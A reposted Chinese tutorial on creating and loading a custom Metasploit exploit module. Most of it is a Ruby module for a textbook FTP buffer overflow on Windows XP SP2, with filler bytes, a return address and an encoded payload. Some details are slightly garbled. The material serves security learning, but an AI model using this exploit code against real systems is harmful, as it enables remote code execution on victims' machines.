转载:https://blog.csdn.net/SilverMagic/article/details/40978081
- 首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如fwdtest
- 仿造exploits目录下的其他exp(rb文件)编写自己的exp.rb脚本(这边用0day安全:软件漏洞分析技术里的一个栗子)
-
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest
-
0day1.rb
-
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest
-
##
-
# This module requires Metasploit: http//metasploit.com/download
-
# Current source: https://github.com/rapid7/metasploit-framework
-
#
-
-
class Metasploit3 < Msf::Exploit::Remote
-
include Msf::Exploit::Remote::Ftp
-
def initialize(info = {})
-
super(update_info(info,
-
'Name' => 'security test',
-
'Description' => %q{
-
This module exploits a buffer overflow.
-
},
-
'Author' => 'fwd',
-
'License' => MSF_LICENSE,
-
'Privileged' => true,
-
'Payload' =>
-
{
-
'Space' => 300,
-
'BadChars' => "x00",
-
},
-
'Platform' => 'win',
-
'Targets' =>
-
[
-
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x7c809f83 } ],
-
]))
-
end
-
-
def exploit
-
connect
-
attack_buf = 'a'*200
-
attack_buf += [target.ret].pack('V')
-
attack_buf += payload.encoded
-
sock.put(attack_buf)
-
handler
-
disconnect
-
end
-
end
-
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest#
- 在控制台下启动metasploit
- 在msf提示符下输入reload_all重新加载所有模块
- 在msf提示符下输入use exploit/fwdtest/exp(输入的时候可以用tab补全,如果不能补全说明就有问题)
